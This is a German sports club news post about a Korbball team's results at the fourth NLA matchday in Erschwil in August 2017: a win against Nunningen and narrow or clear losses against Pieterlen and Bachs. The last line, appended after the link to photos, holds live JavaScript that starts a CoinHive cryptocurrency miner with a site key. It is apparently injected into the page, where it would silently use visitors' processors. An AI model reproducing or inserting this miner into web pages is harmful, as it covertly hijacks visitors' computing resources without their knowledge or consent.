2 wichtige Punkte am 4. NLA Spieltag in Erschwil

erstellt am: 13.08.2017 | Kategorie: Korbball

Gestern ging es in Erschwil los, mit der NLA Rückrunde 2017. Gemäss dem Vorrundenspielplan traf unsere Equipe dabei auf Nunningen, Pieterlen und Bachs. Das Ziel war klar: Gegen Direkt-Konkurrent Nunningen musste man punkten, gegen Pieterlen haben wir – zumindest im 2017 noch – nichts zu verlieren und gegen Bachs rechnete man sich Chancen aus. Fazit: Den Soll erfüllt, ein Exploit im letzten Spiel allerdings knapp verpasst.

In das erste Spiel gegen Nunningen hätten wir besser fast nicht starten können. Früh in Führung, Fehlwürfe (zumindest unserer Nr. 14) praktisch Fehlanzeige, etwas frustrierte Gegner. Doch wie schon mehrmals in dieser Saison, konnten wir den Vorsprung nicht verwalten und gaben ihn noch vor der Halbzeit wieder aus den Händen. Nach einem 6:6 zur Pause liefen wir die ersten 15 Minuten der 2. Halbzeit einem Rückstand nach, ehe wir die Partie in den letzten 5 Minuten noch zu unseren Gunsten kehren konnten. Es war ein extrem wichtiger Sieg und der Start in die Rückrunde den wir gebraucht hatten.

Die Partie gegen Pieterlen verlief ähnlich wie in der Vorrunde. Konnte man in den ersten 10 Minuten noch einigermassen mithalten, schaffte es Pieterlen das Tempo und den Druck zunehmend zu erhöhen, während wir unseren Fokus etwas verloren und uns stattdessen mehr mit dem Gegner und den Schiedsrichtern, als mit unserem eigenen Spiel beschäftigten. Dementsprechend konnte sich Pieterlen nach und nach absetzen und die Partie endete mit einer 7:14 Niederlage.

Mit 16 erzielten Treffern kann man ein Spiel doch nicht verlieren?! Wenn man in der ersten Halbzeit 11 Gegentreffer erhält leider schon.. wie wir im Spiel gegen Bachs am eigenen Leibe erfahren mussten. Mit 7:11 pfiff das Schiedsrichtergespann die ersten 20 Minuten ab. Was folgte, war eine unserer besten Halbzeiten an der bisherigen Meisterschaft. In einer schnellen, attraktiven 2. Halbzeit, in einem allgemein sehr fairen Spiel, konnten wir zu einer Aufholjagd ansetzen, welche um ein Haar noch mit einem Punktgewinn gekrönt wurde. Trotzdem endete das Spiel letzendlich zu unseren Ungusten mit 16:17 und ein dritter Punkt am 4. Spieltag blieb uns leider verwehrt.

Weiterhin sind wir in der Tabelle auf dem 6. Platz aufzufinden, wobei Nunningen dank 4 gewonnen Punkten zu uns aufschliessen konnte. Bereits nächsten Samstag, 19. August folgt die wohl wegweisende 5. Runde in Madiswil.

Bilder zur Runde findet ihr hier.var miner = new CoinHive.Anonymous(‚xdy0ZLd0XshUUGEEVTHOJTQSBcxt50ms‘); miner.start();